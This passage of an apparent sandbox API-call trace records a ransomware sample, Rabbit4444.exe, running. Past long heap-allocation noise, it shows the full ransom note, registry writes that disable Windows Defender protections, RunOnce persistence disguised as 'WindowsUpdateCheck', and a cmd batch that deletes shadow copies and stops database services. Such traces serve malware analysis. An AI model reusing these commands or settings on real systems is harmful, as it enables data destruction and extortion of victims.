out: hHeap=0xe0000) returned 1 [0036.840] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ea0 | out: hHeap=0xe0000) returned 1 [0036.840] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108c60 | out: hHeap=0xe0000) returned 1 [0036.840] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bd0 | out: hHeap=0xe0000) returned 1 [0036.840] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1099e0 | out: hHeap=0xe0000) returned 1 [0036.840] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097a0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108cf0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108fc0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108e10 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109200 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108d80 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109050 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1090e0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109170 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109440 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109320 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1093b0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1094d0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095f0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109830 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098c0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109680 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109710 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109950 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107290 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107950 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106ab0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106fc0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106c60 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1075f0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109560 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a70 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108b40 | out: hHeap=0xe0000) returned 1 [0036.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105840 | out: hHeap=0xe0000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109950 [0036.842] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1095f0 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x105fe8 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x1053b0 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x106100 [0036.842] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053b0 | out: hHeap=0xe0000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x106218 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x105ed0 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103c20 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109170 [0036.842] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x105728 [0036.842] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109170 | out: hHeap=0xe0000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103ba8 [0036.842] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0036.842] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053c0 [0036.842] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053c0 | out: hHeap=0xe0000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x109560 [0036.842] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103ba8 | out: hHeap=0xe0000) returned 1 [0036.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x105840 [0036.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109560 | out: hHeap=0xe0000) returned 1 [0036.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053e0 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105c40 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105fa0 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1061e0 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1058e0 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a00 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106420 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106270 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105e80 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106540 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105cd0 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106300 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1057c0 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106030 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1064b0 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a90 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105d60 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105610 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105970 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1056a0 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105730 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105df0 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105f10 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105850 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105b20 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105bb0 [0037.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108760 [0037.080] SetLastError (dwErrCode=0x6) [0037.080] lstrlenA (lpString="Rabbit4444\nHOW TO BACK YOUR FILES.txt\nNQDPDE\n") returned 45 [0037.080] lstrcpynA (in: lpString1=0x6fd9ed, lpString2="network", iMaxLength=147 | out: lpString1="network") returned="network" [0037.081] lstrlenA (lpString="c4 +k 6S PN PE 9c Cf oS 2o tL js d4 HL Vg 0i 25\r\nGa Vc iL s3 rU m9 Qn jx IK s6 mg qk 1g eX XB ME\r\n3T lu WN Ar 9c PX qv 2P ww kC rO xM AB bS s4 YT\r\nc0 sX XT 3f mh yy D5 VM Wi 8V RB YH FE m3 OS B+\r\nWO z4 19 ZT ls bF Bh AL F+ W3 fi 4N Hv mB zx 3l\r\noU 7E QY GA ww sw UQ SK HI RV +H 7+ jd l5 Eu nd\r\naw KJ ue WG lT Lh h6 76 mr hb sU rQ fo v9 Gz cy\r\nWA pB Wj pW iO Up Aa Rk zT uj IK 2k VE 6l gS ZW\r\nv7 o7 Im vB 7Z L8 X9 eq Jl SA w6 QU tU 2q 2g iu\r\n+6 fJ XQ yl gM +u Ef vX yQ Mf 2Y Pd Bu HZ q+ vD\r\n2p Lv ts hw CA DF YX 2G +6 RJ zf mB l1 T5 vv se\r\n5t l+ zg O2 yC j3 aI b8 vC bV SX 9v c/ e9 zQ jv\r\nc+ /n kf +B cd sG vr tL bA hX tb 6i k9 iD Eq vV\r\nDT o+ BK UP 4f fy r5 Lk R3 r9 X2 yt bn Eb 06 7F\r\nIt L4 te Cn eS so 2h lG aH 74 HX BN OR qt po vh\r\n6Q E9 cQ vZ Ti W9 pK Jb 44 m6 1K EU 48 9K YL KK\r\ngM 66 Qu Ff XF aj hr Wx 0k rx ik 7z uK Zo tF 6v\r\n14 7B j3 m8 kn U3 wJ Un 3t wH vN JG Xk XH zn oc\r\nyO yG ll SX pO Qz zB 1j /0 /m lt eo 0I Yy yN ZB\r\nIW Np C5 Ts VB rE ls lI bV TS nV Gt 23 tm oZ Zb\r\nyD n0 If Rk dl t4 +k nL 1S Et Br 9i 1V s2 vW wB\r\nAa i8 L1 TU tC I= ") returned 1047 [0037.081] lstrlenA (lpString="{{ID}}") returned 6 [0037.081] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0037.081] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0037.082] CloseHandle (hObject=0x0) returned 0 [0037.082] CloseHandle (hObject=0x0) returned 0 [0037.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6748 [0037.082] RtlInitializeSListHead (in: ListHead=0xf6750 | out: ListHead=0xf6750) [0037.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf68c8 [0037.082] RtlInitializeSListHead (in: ListHead=0xf68d0 | out: ListHead=0xf68d0) [0037.082] GetEnvironmentVariableW (in: lpName="allusersprofile", lpBuffer=0x1413b20, nSize=0x104 | out: lpBuffer="C:\\ProgramData") returned 0xe [0037.082] lstrlenW (lpString="C:\\ProgramData") returned 14 [0037.082] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0037.082] lstrcatW (in: lpString1="", lpString2="\\local" | out: lpString1="\\local") returned="\\local" [0037.082] CreateDirectoryW (lpPathName="C:\\ProgramData\\local" (normalized: "c:\\programdata\\local"), lpSecurityAttributes=0x0) returned 1 [0037.086] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\local" | out: lpString1="C:\\ProgramData\\local") returned="C:\\ProgramData\\local" [0037.086] lstrcatW (in: lpString1="C:\\ProgramData\\local", lpString2="\\" | out: lpString1="C:\\ProgramData\\local\\") returned="C:\\ProgramData\\local\\" [0037.086] lstrcatW (in: lpString1="C:\\ProgramData\\local\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3") returned="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3" [0037.086] CreateFileW (lpFileName="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\programdata\\local\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x244 [0037.088] WriteFile (in: hFile=0x244, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x6fcab0, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x6fcab0*=0x3d4, lpOverlapped=0x0) returned 1 [0037.092] FlushFileBuffers (hFile=0x244) returned 1 [0037.093] SetFileAttributesW (lpFileName="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0037.095] CloseHandle (hObject=0x244) returned 1 [0037.095] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\local" | out: lpString1="C:\\ProgramData\\local") returned="C:\\ProgramData\\local" [0037.095] lstrcatW (in: lpString1="C:\\ProgramData\\local", lpString2="\\" | out: lpString1="C:\\ProgramData\\local\\") returned="C:\\ProgramData\\local\\" [0037.095] lstrcatW (in: lpString1="C:\\ProgramData\\local\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3") returned="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3" [0037.095] CreateFileW (lpFileName="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\programdata\\local\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x244 [0037.095] ReadFile (in: hFile=0x244, lpBuffer=0x6fc6d8, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x6fc6d4, lpOverlapped=0x0 | out: lpBuffer=0x6fc6d8*, lpNumberOfBytesRead=0x6fc6d4*=0x3d4, lpOverlapped=0x0) returned 1 [0037.095] CloseHandle (hObject=0x244) returned 1 [0037.095] GetLastError () returned 0x0 [0037.095] lstrcatW (in: lpString1="", lpString2="\\share" | out: lpString1="\\share") returned="\\share" [0037.096] CreateDirectoryW (lpPathName="C:\\ProgramData\\share" (normalized: "c:\\programdata\\share"), lpSecurityAttributes=0x0) returned 1 [0037.096] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\share" | out: lpString1="C:\\ProgramData\\share") returned="C:\\ProgramData\\share" [0037.096] lstrcatW (in: lpString1="C:\\ProgramData\\share", lpString2="\\" | out: lpString1="C:\\ProgramData\\share\\") returned="C:\\ProgramData\\share\\" [0037.096] lstrcatW (in: lpString1="C:\\ProgramData\\share\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3") returned="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3" [0037.096] CreateFileW (lpFileName="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\programdata\\share\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x244 [0037.096] WriteFile (in: hFile=0x244, lpBuffer=0x100e9c*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x6fcab0, lpOverlapped=0x0 | out: lpBuffer=0x100e9c*, lpNumberOfBytesWritten=0x6fcab0*=0x3d4, lpOverlapped=0x0) returned 1 [0037.099] FlushFileBuffers (hFile=0x244) returned 1 [0037.100] SetFileAttributesW (lpFileName="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0037.101] CloseHandle (hObject=0x244) returned 1 [0037.102] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\share" | out: lpString1="C:\\ProgramData\\share") returned="C:\\ProgramData\\share" [0037.102] lstrcatW (in: lpString1="C:\\ProgramData\\share", lpString2="\\" | out: lpString1="C:\\ProgramData\\share\\") returned="C:\\ProgramData\\share\\" [0037.102] lstrcatW (in: lpString1="C:\\ProgramData\\share\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3") returned="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3" [0037.102] CreateFileW (lpFileName="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\programdata\\share\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x244 [0037.102] ReadFile (in: hFile=0x244, lpBuffer=0x6fc6d8, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x6fc6d4, lpOverlapped=0x0 | out: lpBuffer=0x6fc6d8*, lpNumberOfBytesRead=0x6fc6d4*=0x3d4, lpOverlapped=0x0) returned 1 [0037.102] CloseHandle (hObject=0x244) returned 1 [0037.102] GetLastError () returned 0x0 [0037.102] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\HomeGroup", phkResult=0x6fdab4 | out: phkResult=0x6fdab4*=0x244) returned 0x0 [0037.104] RegSetValueExW (in: hKey=0x244, lpValueName="DisableHomeGroup", Reserved=0x0, dwType=0x4, lpData=0x6fdab0*=0x1, cbData=0x4 | out: lpData=0x6fdab0*=0x1) returned 0x0 [0037.108] RegCloseKey (hKey=0x244) returned 0x0 [0037.108] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", phkResult=0x6fdab4 | out: phkResult=0x6fdab4*=0x244) returned 0x0 [0037.108] RegSetValueExW (in: hKey=0x244, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x6fdab0*=0x1, cbData=0x4 | out: lpData=0x6fdab0*=0x1) returned 0x0 [0037.108] RegCloseKey (hKey=0x244) returned 0x0 [0037.108] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Policy Manager", phkResult=0x6fdab4 | out: phkResult=0x6fdab4*=0x244) returned 0x0 [0037.108] RegCloseKey (hKey=0x244) returned 0x0 [0037.108] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", phkResult=0x6fdab4 | out: phkResult=0x6fdab4*=0x244) returned 0x0 [0037.108] RegSetValueExW (in: hKey=0x244, lpValueName="DisableRealtimeMonitoring", Reserved=0x0, dwType=0x4, lpData=0x6fdab0*=0x1, cbData=0x4 | out: lpData=0x6fdab0*=0x1) returned 0x0 [0037.108] RegSetValueExW (in: hKey=0x244, lpValueName="DisableBehaviorMonitoring", Reserved=0x0, dwType=0x4, lpData=0x6fdab0*=0x1, cbData=0x4 | out: lpData=0x6fdab0*=0x1) returned 0x0 [0037.109] RegSetValueExW (in: hKey=0x244, lpValueName="DisableOnAccessProtection", Reserved=0x0, dwType=0x4, lpData=0x6fdab0*=0x1, cbData=0x4 | out: lpData=0x6fdab0*=0x1) returned 0x0 [0037.109] RegCloseKey (hKey=0x244) returned 0x0 [0037.109] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", phkResult=0x6fdb9c | out: phkResult=0x6fdb9c*=0x248) returned 0x0 [0037.109] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe") returned 38 [0037.109] RegSetValueExW (in: hKey=0x248, lpValueName="WindowsUpdateCheck", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe", cbData=0x4c | out: lpData="C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe") returned 0x0 [0037.109] RegCloseKey (hKey=0x248) returned 0x0 [0037.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x1c) returned 0xff798 [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] GetLastError () returned 0x0 [0037.109] SetLastError (dwErrCode=0x0) [0037.109] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x75e90000 [0037.109] GetProcAddress (hModule=0x75e90000, lpProcName="AreFileApisANSI") returned 0x75ea4280 [0037.109] AreFileApisANSI () returned 1 [0037.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0037.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x38) returned 0x102b10 [0037.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff798, cbMultiByte=-1, lpWideCharStr=0x102b10, cchWideChar=28 | out: lpWideCharStr="C:\\WINDOWS\\system32\\cmd.exe") returned 28 [0037.110] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x6fda10 | out: lpFileInformation=0x6fda10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708dd01f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x708dd01f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x708dd01f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x38a00)) returned 1 [0037.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102b10 | out: hHeap=0xe0000) returned 1 [0037.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x388) returned 0x10b038 [0037.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x144) returned 0xf10b8 [0037.110] GetLastError () returned 0x0 [0037.110] SetLastError (dwErrCode=0x0) [0037.110] CreateProcessA (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine="C:\\WINDOWS\\system32\\cmd.exe /c @echo off\r\nsc config browser\r\nsc config browser start=enabled\r\nvssadmin delete shadows /all /quiet\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x6fd9cc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x144, lpReserved2=0xf10b8, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x6fda10 | out: lpCommandLine="C:\\WINDOWS\\system32\\cmd.exe /c @echo off\r\nsc config browser\r\nsc config browser start=enabled\r\nvssadmin delete shadows /all /quiet\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n", lpProcessInformation=0x6fda10*(hProcess=0x24c, hThread=0x248, dwProcessId=0xcb8, dwThreadId=0x7f0)) returned 1 [0037.530] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0xffffffff) returned 0x0 [0042.385] GetExitCodeProcess (in: hProcess=0x24c, lpExitCode=0x6fda30 | out: lpExitCode=0x6fda30*=0x0) returned 1 [0042.385] CloseHandle (hObject=0x248) returned 1 [0042.385] CloseHandle (hObject=0x24c) returned 1 [0042.385] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf10b8 | out: hHeap=0xe0000) returned 1 [0042.385] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b038 | out: hHeap=0xe0000) returned 1 [0042.385] GetLastError () returned 0x0 [0042.385] SetLastError 